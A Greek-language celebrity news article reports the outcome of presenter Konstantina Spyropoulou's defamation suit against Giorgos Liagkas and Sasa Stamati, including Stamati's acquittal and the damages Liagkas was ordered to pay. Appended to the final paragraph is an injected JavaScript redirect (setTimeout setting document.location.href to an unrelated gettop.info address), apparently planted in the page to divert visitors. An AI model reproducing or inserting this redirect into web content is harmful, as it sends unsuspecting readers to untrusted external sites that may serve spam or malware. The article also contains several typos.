Τέλος στη δικαστική διαμάχη Σπυροπούλου-Λιάγκα – «Αθώα» η Σταμάτη

0
9

 

Μισό εκατομμύριο ζητούσε αρχικά με αγωγή της η παρουσιάστρια του Alpha και της εκπομπής «Σπίτι μου Σπιτάκι μου» από τον Γιώργο Λιάγκα και τη Σάσα Σταμάτη κατηγορώντας τους ότι τη δυσφήμησαν με σχόλια που έκαναν στον αέρα της εκπομπής τους Πρω1νο.

Ωστόσο, μετά την ανακωχή τους διεκδικούσε μόλις 50.000 από τον καθένα. Σύμφωνα με την απόφαση του δικαστηρίου, η Σάσα Σταμάτη αθωώθηκε από την καηγορία της συκοφαντικής δυσφήμησης. Η Σταμάτη είχε πει στον «αέρα» της εκπομπής ότι η Κωνστντίνα Σπυροπούλου ευθύνεται για την απομάκρυνση των συνεργατών της παό την εκπομπή της στον Alpha. Με την απόφαση η Σπυροπούλου υποχρεούται να καταβάλει και 1.000 € δικαστικά έξοδα.

Όσον αφορά στην κόντρα της με τον Γιώργο Λιάγκα, το δικαστήριο επεδίκασε 8.000 ευρώ κάνοντας εν μέρει δεκτή την αγωγή της Σπυροπούλου, καθώς θεώρησε ότι ήταν προσβλητικοί οι σχολιασμοί του δημοσιογράφου για την προσωπική ζωή της παρουσιάστριας. Ο Γιώργος Λιάγκας είχε πει ότι υπάρχουν γυναίκες που τους πληρώνουν σωματοφύλακες άλλοι άνθρωποι, αφήνοντας υπαινιγμούς για την Κωνσταντίνα Σπυροπούλου.

Τελικά από το μισό εκατομμύριο που ζητούσε αρχικά το δικαστήριο αξιολόγησε την ηθική βλάβη της σε 5.800 ευρώ, καθώς αφαιρούνται τα 1.000 ευρώ για τα δικαστικά έξοδα της Σάσα Σταμάτη αλλά και τα 1.200 που είχε καταβάλει η παρουσιάστρια ως δικαστικό ένσημο για τη διεκδίκηση των 100.000 ευρώ. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here